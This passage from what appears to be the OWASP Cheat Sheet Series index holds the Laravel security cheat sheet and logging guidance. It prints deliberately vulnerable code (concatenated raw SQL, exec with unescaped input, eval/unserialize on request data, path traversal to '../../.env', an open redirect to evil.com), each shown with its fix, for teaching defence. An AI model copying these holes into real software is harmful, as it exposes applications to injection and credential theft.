"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#authentication","title":"Authentication","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#guards-and-providers","title":"Guards and Providers","text":"

At its core, Laravel's authentication facilities are made up of \"guards\" and \"providers\". Guards define how users are authenticated for each request. Providers define how users are retrieved from your persistent storage.

Laravel ships with a session guard which maintains state using session storage and cookies, and a token guard for API tokens.

For providers, Laravel ships with an Eloquent provider for retrieving users using the Eloquent ORM and a database provider for retrieving users using the database query builder.

Guards and providers can be configured in the config/auth.php file. Laravel offers the ability to build custom guards and providers as well.
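
A condensed sketch of the relevant section of config/auth.php (these are the framework defaults for the web guard and users provider):

'guards' => [\n    'web' => [\n        'driver' => 'session',\n        'provider' => 'users',\n    ],\n],\n\n'providers' => [\n    'users' => [\n        'driver' => 'eloquent',\n        'model' => App\\Models\\User::class,\n    ],\n],\n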

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#starter-kits","title":"Starter Kits","text":"

Laravel offers a wide variety of first party application starter kits that include in-built authentication features:

  1. Laravel Breeze: A simple, minimal implementation of all Laravel's authentication features including login, registration, password reset, email verification and password confirmation.
  2. Laravel Fortify: A headless authentication backend that includes the above authentication features along with two-factor authentication.
  3. Laravel Jetstream: An application starter kit that provides a UI on top of Laravel Fortify's authentication features.

It is recommended to use one of these starter kits to ensure robust and secure authentication for your Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#api-authentication-packages","title":"API Authentication Packages","text":"

Laravel also offers the following API authentication packages:

  1. Passport: An OAuth2 authentication provider.
  2. Sanctum: An API token authentication provider.

Starter kits such as Fortify and Jetstream have in-built support for Sanctum.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#mass-assignment","title":"Mass Assignment","text":"

Mass assignment is a common vulnerability in modern web applications that use an ORM like Laravel's Eloquent ORM.

Mass assignment is a vulnerability where an ORM pattern is abused to modify data items that the user should not normally be allowed to modify.

Consider the following code:

Route::any('/profile', function (Request $request) {\n    $request->user()->forceFill($request->all())->save();\n\n    $user = $request->user()->fresh();\n\n    return response()->json(compact('user'));\n})->middleware('auth');\n

The above profile route allows the logged in user to change their profile information.

However, let's say there is an is_admin column in the users table. You probably do not want the user to be allowed to change the value of this column. However, the above code allows users to change any column values for their row in the users table. This is a mass assignment vulnerability.

Laravel has in-built features by default to protect against this vulnerability. Make sure of the following to stay secure:
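
As a rough illustration of these protections (the field names are hypothetical), define the mass-assignable attributes on the model and only pass validated input to it, instead of calling forceFill() with $request->all():

// app/Models/User.php: only these attributes may be mass assigned,\n// so a column such as is_admin cannot be overwritten by request data.\nprotected $fillable = ['name', 'email'];\n\n// Route: validate the input and fill only the validated fields.\nRoute::any('/profile', function (Request $request) {\n    $validated = $request->validate([\n        'name' => 'required|string|max:255',\n        'email' => 'required|email',\n    ]);\n\n    $request->user()->fill($validated)->save();\n\n    return response()->json(['user' => $request->user()->fresh()]);\n})->middleware('auth');\n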

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

SQL Injection attacks are unfortunately quite common in modern web applications and entail attackers providing malicious request input data to interfere with SQL queries. This guide covers SQL injection and how it can be prevented specifically for Laravel applications. You may also refer to the SQL Injection Prevention Cheatsheet for more information that is not specific to Laravel.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#eloquent-orm-sql-injection-protection","title":"Eloquent ORM SQL Injection Protection","text":"

By default, Laravel's Eloquent ORM protects against SQL injection by parameterizing queries and using SQL bindings. For instance, consider the following query:

use App\\Models\\User;\n\nUser::where('email', $email)->get();\n

The code above fires the query below:

select * from `users` where `email` = ?\n

So, even if $email is untrusted user input data, you are protected from SQL injection attacks.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#raw-query-sql-injection","title":"Raw Query SQL Injection","text":"

Laravel also offers raw query expressions and raw queries to construct complex queries or database specific queries that aren't supported out of the box.

While this is great for flexibility, you must be careful to always use SQL data bindings for such queries. Consider the following query:

use Illuminate\\Support\\Facades\\DB;\nuse App\\Models\\User;\n\nUser::whereRaw('email = \"'.$request->input('email').'\"')->get();\nDB::table('users')->whereRaw('email = \"'.$request->input('email').'\"')->get();\n

Both lines of code actually execute the same query, which is vulnerable to SQL injection as the query does not use SQL bindings for untrusted user input data.

The code above fires the following query:

select * from `users` where `email` = \"value of email query parameter\"\n

Always remember to use SQL bindings for request data. We can fix the above code by making the following modification:

use App\\Models\\User;\n\nUser::whereRaw('email = ?', [$request->input('email')])->get();\n

We can even use named SQL bindings like so:

use App\\Models\\User;\n\nUser::whereRaw('email = :email', ['email' => $request->input('email')])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#column-name-sql-injection","title":"Column Name SQL Injection","text":"

You must never allow user input data to dictate column names referenced by your queries.

The following queries may be vulnerable to SQL injection:

use App\\Models\\User;\n\nUser::where($request->input('colname'), 'somedata')->get();\nUser::query()->orderBy($request->input('sortBy'))->get();\n

It is important to note that even though Laravel has some in-built features such as wrapping column names to protect against the above SQL injection vulnerabilities, some database engines (depending on versions and configurations) may still be vulnerable because binding column names is not supported by databases.

At the very least, this may result in a mass assignment vulnerability instead of a SQL injection because you may have expected a certain set of column values, but since they are not validated here, the user is free to use other columns as well.

Always validate user input for such situations like so:

use App\\Models\\User;\n\n$request->validate(['sortBy' => 'in:price,updated_at']);\nUser::query()->orderBy($request->validated()['sortBy'])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#validation-rule-sql-injection","title":"Validation Rule SQL Injection","text":"

Certain validation rules have the option of providing database column names. Such rules are vulnerable to SQL injection in the same manner as column name SQL injection because they construct queries in a similar manner.

For example, the following code may be vulnerable:

use Illuminate\\Validation\\Rule;\n\n$request->validate([\n    'id' => Rule::unique('users')->ignore($id, $request->input('colname'))\n]);\n

Behind the scenes, the above code triggers the following query:

use App\\Models\\User;\n\n$colname = $request->input('colname');\nUser::where($colname, $request->input('id'))->where($colname, '<>', $id)->count();\n

Since the column name is dictated by user input, it is similar to column name SQL injection.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross Site Scripting (XSS)","text":"

XSS attacks are injection attacks where malicious scripts (such as JavaScript code snippets) are injected into trusted websites.

Laravel's Blade templating engine has echo statements {{ }} that automatically escape variables using the htmlspecialchars PHP function to protect against XSS attacks.

Laravel also offers displaying unescaped data using the unescaped syntax {!! !!}. This must not be used on any untrusted data, otherwise your application will be subject to an XSS attack.

For instance, if you have something like this in any of your Blade templates, it would result in a vulnerability:

{!! request()->input('somedata') !!}\n

This, however, is safe to do:

{{ request()->input('somedata') }}\n

For other information on XSS prevention that is not specific to Laravel, you may refer to the Cross Site Scripting Prevention Cheatsheet.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#unrestricted-file-uploads","title":"Unrestricted File Uploads","text":"

Unrestricted file upload attacks entail attackers uploading malicious files to compromise web applications. This section describes how to protect against such attacks while building Laravel applications. You may also refer to the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#always-validate-file-type-and-size","title":"Always Validate File Type and Size","text":"

Always validate the file type (extension or MIME type) and file size to avoid storage DOS attacks and remote code execution:

$request->validate([\n    'photo' => 'file|size:100|mimes:jpg,bmp,png'\n]);\n

Storage DOS attacks exploit missing file size validations and upload massive files to cause a denial of service (DOS) by exhausting the disk space.

Remote code execution attacks entail first, uploading malicious executable files (such as PHP files) and then, triggering their malicious code by visiting the file URL (if public).

Both these attacks can be avoided by simple file validations as mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#do-not-rely-on-user-input-to-dictate-filenames-or-path","title":"Do Not Rely On User Input To Dictate Filenames or Path","text":"

If your application allows user controlled data to construct the path of a file upload, this may result in overwriting a critical file or storing the file in a bad location.

Consider the following code:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), $request->input('filename'));\n\n    return back();\n});\n

This route saves a file to a directory specific to a user ID. Here, we rely on the filename user input data and this may result in a vulnerability as the filename could be something like ../2/filename.pdf. This will upload the file in user ID 2's directory instead of the directory pertaining to the current logged in user.

To fix this, we should use the basename PHP function to strip out any directory information from the filename input data:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), basename($request->input('filename')));\n\n    return back();\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#avoid-processing-zip-or-xml-files-if-possible","title":"Avoid Processing ZIP or XML Files If Possible","text":"

XML files can expose your application to a wide variety of attacks such as XXE attacks, the billion laughs attack and others. If you process ZIP files, you may be exposed to zip bomb DOS attacks.

Refer to the XML Security Cheatsheet and the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#path-traversal","title":"Path Traversal","text":"

A path traversal attack aims to access files by manipulating request input data with ../ sequences and variations or by using absolute file paths.

If you allow users to download files by filename, you may be exposed to this vulnerability if input data is not stripped of directory information.

Consider the following code:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').$request->input('filename'));\n});\n

Here, the filename is not stripped of directory information, so a malformed filename such as ../../.env could expose your application credentials to potential attackers.

Similar to unrestricted file uploads, you should use the basename PHP function to strip out directory information like so:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').basename($request->input('filename')));\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#open-redirection","title":"Open Redirection","text":"

Open Redirection attacks in themselves are not that dangerous but they enable phishing attacks.

Consider the following code:

Route::get('/redirect', function (Request $request) {\n   return redirect($request->input('url'));\n});\n

This code redirects the user to any external URL provided by user input. This could enable attackers to create seemingly safe URLs like https://example.com/redirect?url=http://evil.com. For instance, attackers may use a URL of this type to spoof password reset emails and lead victims to expose their credentials on the attacker's website.
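
One possible mitigation (the allow-list below is hypothetical) is to only redirect to URLs you explicitly trust, or to internal routes:

Route::get('/redirect', function (Request $request) {\n    // Only allow redirects to known, trusted destinations.\n    $allowed = [\n        'https://example.com/welcome',\n        'https://example.com/docs',\n    ];\n\n    $url = $request->input('url');\n\n    abort_unless(in_array($url, $allowed, true), 403);\n\n    return redirect($url);\n});\n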

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-request-forgery-csrf","title":"Cross Site Request Forgery (CSRF)","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated.

Laravel provides CSRF protection out-of-the-box with the VerifyCSRFToken middleware. Generally, if you have this middleware in the web middleware group of your App\\Http\\Kernel class, you should be well protected:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        ...\n         \\App\\Http\\Middleware\\VerifyCsrfToken::class,\n         ...\n    ],\n];\n

Next, for all your POST request forms, you may use the @csrf blade directive to generate the hidden CSRF input token fields:

<form method=\"POST\" action=\"/profile\">\n    @csrf\n\n    <!-- Equivalent to... -->\n    <input type=\"hidden\" name=\"_token\" value=\"{{ csrf_token() }}\" />\n</form>\n

For AJAX requests, you can set up the X-CSRF-Token header.

Laravel also provides the ability to exclude certain routes from CSRF protection using the $except variable in your CSRF middleware class. Typically, you would want to exclude only stateless routes (e.g. APIs or webhooks) from CSRF protection. If any other routes are excluded, these may result in CSRF vulnerabilities.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Command Injection vulnerabilities involve executing shell commands constructed with unescaped user input data.

For example, the following code performs a whois on a user provided domain name:

public function verifyDomain(Request $request)\n{\n    exec('whois '.$request->input('domain'));\n}\n

The above code is vulnerable as the user data is not escaped properly. To escape user input for shell commands, you may use the escapeshellcmd and/or escapeshellarg PHP functions.
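
For example, the snippet above could be hardened by passing the user input through escapeshellarg so it is treated as a single, quoted shell argument:

public function verifyDomain(Request $request)\n{\n    // escapeshellarg() wraps the value in single quotes and escapes any\n    // embedded quotes, preventing the shell from interpreting it.\n    exec('whois '.escapeshellarg($request->input('domain')));\n}\n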

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#other-injections","title":"Other Injections","text":"

Object injection, eval code injection and extract variable hijacking attacks involve unserializing, evaluating or using the extract function on untrusted user input data.

Some examples are:

unserialize($request->input('data'));\neval($request->input('data'));\nextract($request->all());\n

In general, avoid passing any untrusted input data to these dangerous functions.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

You should consider adding the following security headers to your web server or Laravel application middleware:

For more information, refer to the OWASP secure headers project.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#tools","title":"Tools","text":"

You should consider using Enlightn, a static and dynamic analysis tool for Laravel applications that has over 45 automated security checks to identify potential security issues. There are both an open source version and a commercial version of Enlightn available. Enlightn includes extensive 45-page documentation on security vulnerabilities, and a great way to learn more about Laravel security is simply to review that documentation.

You should also use the Enlightn Security Checker or the Local PHP Security Checker. Both of them are open source packages, licensed under the MIT and AGPL licenses respectively, that scan your PHP dependencies for known vulnerabilities using the Security Advisories Database.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html","title":"Logging Cheat Sheet","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is focused on providing developers with concentrated guidance on building application logging mechanisms, especially related to security logging.

Many systems enable network device, operating system, web server, mail server and database server logging, but often custom application event logging is missing, disabled or poorly configured. Custom application logging provides much greater insight than infrastructure logging alone. Web application (e.g. web site or web service) logging is much more than having web server logs enabled (e.g. using Extended Log File Format).

Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#purpose","title":"Purpose","text":"

Application logging should always be included for security events. Application logs are invaluable data for:

Application logging might also be used to record other types of events too such as:

Process monitoring, audit and transaction logs/trails etc. are usually collected for different purposes than security event logging, and this often means they should be kept separate.

The types of events and details collected will tend to be different.

For example, a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little.

Use knowledge of the intended purposes to guide what, when and how much. The remainder of this cheat sheet primarily discusses security event logging.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#design-implementation-and-testing","title":"Design, implementation and testing","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-data-sources","title":"Event data sources","text":"

The application itself has access to a wide range of information events that should be used to generate log entries. Thus, the primary event data source is the application code itself.

The application has the most information about the user (e.g. identity, roles, permissions) and the context of the event (target, action, outcomes), and often this data is not available to either infrastructure devices, or even closely-related applications.

Other sources of information about application usage that could also be considered are:

The degree of confidence in the event information has to be considered when including event data from systems in a different trust zone. Data may be missing, modified, forged, replayed and could be malicious \u2013 it must always be treated as untrusted data.

Consider how the source can be verified, and how integrity and non-repudiation can be enforced.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#where-to-record-event-data","title":"Where to record event data","text":"

Applications commonly write event log data to the file system or a database (SQL or NoSQL). Applications installed on desktops and on mobile devices may use local storage and local databases, as well as sending data to remote storage.

Your selected framework may limit the available choices. All types of applications may send event data to remote systems (instead of or as well as more local storage).

This could be a centralized log collection and management system (e.g. SIEM or SEM) or another application elsewhere. Consider whether the application can simply send its event stream, unbuffered, to stdout, for management by the execution environment.

Consider separate files/tables for extended event information such as error stack traces or a record of HTTP request and response headers and bodies.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#which-events-to-log","title":"Which events to log","text":"

The level and content of security monitoring, alerting and reporting needs to be set during the requirements and design stage of projects, and should be proportionate to the information security risks. This can then be used to define what should be logged.

There is no one size fits all solution, and a blind checklist approach can lead to unnecessary \"alarm fog\" that means real problems go undetected.

Where possible, always log:

Optionally consider if the following events can be logged and whether it is desirable information:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-attributes","title":"Event attributes","text":"

Each log entry needs to include sufficient information for the intended subsequent monitoring and analysis. It could be full content data, but is more likely to be an extract or just summary properties.

The application logs must record \"when, where, who and what\" for each event.

The properties for these will be different depending on the architecture, class of application and host system/device, but often include the following:

Additionally consider recording:

For more information on these, see the \"other\" related articles listed at the end, especially the comprehensive article by Anton Chuvakin and Gunnar Peterson.

Note A: The \"Interaction identifier\" is a method of linking all (relevant) events for a single user interaction (e.g. desktop application form submission, web page request, mobile app button click, web service call). The application knows all these events relate to the same interaction, and this should be recorded instead of losing the information and forcing subsequent correlation techniques to re-construct the separate events. For example a single SOAP request may have multiple input validation failures and they may span a small range of times. As another example, an output validation failure may occur much later than the input submission for a long-running \"saga request\" submitted by the application to a database server.

Note B: Each organisation should ensure it has a consistent, and documented, approach to classification of events (type, confidence, severity), the syntax of descriptions, and field lengths & data types including the format used for dates/times.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#data-to-exclude","title":"Data to exclude","text":"

Never log data unless it is legally sanctioned. For example intercepting some communications, monitoring employees, and collecting some data without consent may all be illegal.

Never exclude any events from \"known\" users such as other internal systems, \"trusted\" third parties, search engine robots, uptime/process and other remote monitoring systems, pen testers, auditors. However, you may want to include a classification flag for each of these in the recorded data.

The following should usually not be recorded directly in the logs, but instead should be removed, masked, sanitized, hashed or encrypted:

Sometimes the following data can also exist, and whilst useful for subsequent investigation, it may also need to be treated in some special manner before the event is recorded:

Consider using personal data de-identification techniques such as deletion, scrambling or pseudonymization of direct and indirect identifiers where the individual's identity is not required, or the risk is considered too great.
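
As an illustration only (the keyed-hash approach and the variable names are assumptions, not a requirement of this cheat sheet), a direct identifier can be pseudonymized before it is written to the log:

// Pseudonymize an identifier with a keyed hash so the raw value is never logged;\n// the key must be managed and rotated outside the logging pipeline.\n$pseudonym = hash_hmac('sha256', $userEmail, $pseudonymizationKey);\n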

In some systems, sanitization can be undertaken post log collection, and prior to log display.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#customizable-logging","title":"Customizable logging","text":"

It may be desirable to be able to alter the level of logging (type of events based on severity or threat level, amount of detail recorded). If this is implemented, ensure that:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-collection","title":"Event collection","text":"

If your development framework supports suitable logging mechanisms, use or build upon them. Otherwise, implement an application-wide log handler which can be called from other modules/components.

Document the interface referencing the organisation-specific event classification and description syntax requirements.

If possible create this log handler as a standard module that can be thoroughly tested, deployed in multiple applications, and added to a list of approved & recommended modules.
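
A minimal sketch of such a handler (the class name and fields are illustrative and should be adapted to your organisation's event classification and description syntax) might look like:

class SecurityLogger\n{\n    public static function log(string $event, string $level, string $description): void\n    {\n        $entry = [\n            'datetime'    => gmdate('c'), // ISO 8601, UTC\n            'appid'       => 'example.app', // illustrative application identifier\n            'event'       => $event,\n            'level'       => $level,\n            'description' => $description,\n        ];\n        error_log(json_encode($entry));\n    }\n}\n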

Note C: This is not always possible where the application is running on a device under some other party's control (e.g. on an individual's mobile phone, on a remote customer's workstation which is on another corporate network). In these cases attempt to measure the time offset, or record a confidence level in the event timestamp.

Where possible record data in a standard format, or at least ensure it can be exported/broadcast using an industry-standard format.

In some cases, events may be relayed or collected together at intermediate points. In the latter case, some data may be aggregated or summarized before being forwarded on to a central repository and analysis system.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#verification","title":"Verification","text":"

Logging functionality and systems must be included in code review, application testing and security verification processes:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#network-architecture","title":"Network architecture","text":"

As an example, the diagram below shows a service that provides business functionality to customers. We recommend creating a centralized system for collecting logs. There may be many such services, but all of them must securely collect logs in a centralized system.

Applications of this business service are located in network segments:

The service responsible for collecting IT events, including security events, is located in the following segments:

For example, all external requests from users go through the API management service (see the application in the MIDDLEWARE 2 segment).

As you can see in the image above, at the network level the processes of saving and downloading logs require opening different network accesses (ports); the arrows are highlighted in different colors. Saving and downloading are also performed by different applications.

Full network segmentation cheat sheet by sergiomarotco: link

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#deployment-and-operation","title":"Deployment and operation","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#release","title":"Release","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#operation","title":"Operation","text":"

Enable processes to detect whether logging has stopped, and to identify tampering or unauthorized access and deletion (see protection below).

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#protection","title":"Protection","text":"

The logging mechanisms and collected event data must be protected from mis-use such as tampering in transit, and unauthorized access, modification and deletion once stored. Logs may contain personal and other sensitive information, or the data may contain information regarding the application's code and logic.

In addition, the collected information in the logs may itself have business value (to competitors, gossip-mongers, journalists and activists) such as allowing the estimate of revenues, or providing performance information about employees.

This data may be held on end devices, at intermediate points, in centralized repositories and in archives and backups.

Consider whether parts of the data may need to be excluded, masked, sanitized, hashed or encrypted during examination or extraction.

At rest:

In transit:

See NIST SP 800-92 Guide to Computer Security Log Management for more guidance.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#monitoring-of-events","title":"Monitoring of events","text":"

The logged event data needs to be available for review, and processes need to be in place for appropriate monitoring, alerting and reporting:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#disposal-of-logs","title":"Disposal of logs","text":"

Log data, temporary debug logs, and backups/copies/extractions must not be destroyed before the end of the required data retention period, and must not be kept beyond this time.

Legal, regulatory and contractual obligations may impact on these periods.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#attacks-on-logs","title":"Attacks on Logs","text":"

Because of their usefulness as a defense, logs may be a target of attacks. See also OWASP Log Injection and CWE-117.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#confidentiality","title":"Confidentiality","text":"

Who should be able to read what? A confidentiality attack enables an unauthorized party to access sensitive information stored in logs.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#integrity","title":"Integrity","text":"

Which information should be modifiable by whom?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#availability","title":"Availability","text":"

What downtime is acceptable?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#accountability","title":"Accountability","text":"

Who is responsible for harm?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html","title":"Application Logging Vocabulary Cheat Sheet","text":"

This document proposes a standard vocabulary for logging security events. The intent is to simplify monitoring and alerting such that, assuming developers trap errors and log them using this vocabulary, monitoring and alerting would be improved by simply keying on these terms.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#overview","title":"Overview","text":"

Each year IBM Security commissions the Ponemon Institute to survey companies around the world for information related to security breaches, mitigation, and the associated costs; the result is called the Cost of a Data Breach Report.

In addition to the millions of dollars lost due to breaches, the report finds that the mean time to identify a breach continues to hover around 200 days. Clearly, improving our ability to monitor applications and alert on anomalous behavior would improve our time to identify and mitigate an attack against our applications.

IBM Cost of a Data Breach Study 2020, Fig.34, pg.52, [https://www.ibm.com/security/data-breach]

This logging standard would seek to define specific keywords which, when applied consistently across software, would allow groups to simply monitor for these event terms across all applications and respond quickly in the event of an attack.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#assumptions","title":"Assumptions","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#getting-started","title":"Getting Started","text":"

As a reminder, the goal of logging is to be able to alert on specific security events. Of course, the first step to logging these events is good error handling; if you're not trapping the events, you have no event to log.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#identifying-events","title":"Identifying Events","text":"

In order to better understand security event logging, a good high-level understanding of threat modeling is helpful, even if it's a simple approach such as:

  1. What could go wrong?

     - Orders: could someone order on behalf of another?
     - Authentication: could I log in as someone else?
     - Authorization: could I see someone else's account?

  2. What would happen if it did?

     - Orders: I've placed an order on behalf of another... to an abandoned warehouse in New Jersey. Oops.
     - Then I bragged about it on 4Chan.
     - Then I told the New York Times about it.

  3. Who might intend to do this?

     - Intentional attacks by hackers.
     - An employee \"testing\" how things work.
     - An API coded incorrectly doing things the author did not intend.
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#format","title":"Format","text":"

NOTE: All dates should be logged in ISO 8601 format WITH UTC offset to ensure maximum portability

{\n    \"datetime\": \"2021-01-01T01:01:01-0700\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"AUTHN_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    \"useragent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\",\n    \"source_ip\": \"165.225.50.94\",\n    \"host_ip\": \"10.12.7.9\",\n    \"hostname\": \"portalauth.foobar.com\",\n    \"protocol\": \"https\",\n    \"port\": \"440\",\n    \"request_uri\": \"/api/v2/auth/\",\n    \"request_method\": \"POST\",\n    \"region\": \"AWS-US-WEST-2\",\n    \"geo\": \"USA\"\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#the-vocabulary","title":"The Vocabulary","text":"

What follows are the various event types that should be captured. For each event type there is a prefix like \"authn\" and additional data that should be included for that event.

Portions of the full logging format are included as examples, but a complete event log should follow the format above.
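
As a sketch of how an application might emit these events consistently (the helper name is hypothetical; it simply builds the event string from the vocabulary prefix and its parameters, reusing the format above):

// Hypothetical helper that emits events such as authn_login_fail:joebob1\nfunction log_vocab_event(string $prefix, array $params, string $level, string $description): void\n{\n    error_log(json_encode([\n        'datetime'    => gmdate('c'),\n        'event'       => $prefix . ':' . implode(',', $params),\n        'level'       => $level,\n        'description' => $description,\n    ]));\n}\n\nlog_vocab_event('authn_login_fail', ['joebob1'], 'WARN', 'User joebob1 login failed');\n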

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authentication-authn","title":"Authentication [AUTHN]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successuserid","title":"authn_login_success[:userid]","text":"

Description All login events should be recorded including success.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successafterfailuseridretries","title":"authn_login_successafterfail[:userid,retries]","text":"

Description The user successfully logged in after previously failing.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_successafterfail:joebob1,2\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_failuserid","title":"authn_login_fail[:userid]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login failed\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_fail_maxuseridmaxlimitint","title":"authn_login_fail_max[:userid,maxlimit(int)]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail_max:joebob1,3\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 reached the login fail limit of 3\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_lockuseridreason","title":"authn_login_lock[:userid,reason]","text":"

Description When the feature exists to lock an account after x retries or other condition, the lock should be logged with relevant data.

Level: WARN

Reasons:

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_lock:joebob1,maxretries\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login locked because maxretries exceeded\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_changeuserid","title":"authn_password_change[:userid]","text":"

Description Every password change should be logged, including the userid that it was for.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has successfully changed their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_change_failuserid","title":"authn_password_change_fail[:userid]","text":"

Description An attempt to change a password that failed. May also trigger other events such as authn_login_lock.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 failed to changing their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_impossible_traveluseridregion1region2","title":"authn_impossible_travel[:userid,region1,region2]","text":"

Description When a user is logged in from one city and suddenly appears in another, too far away to have traveled in a reasonable timeframe, this often indicates a potential account takeover.

Level: CRITICAL

Example:

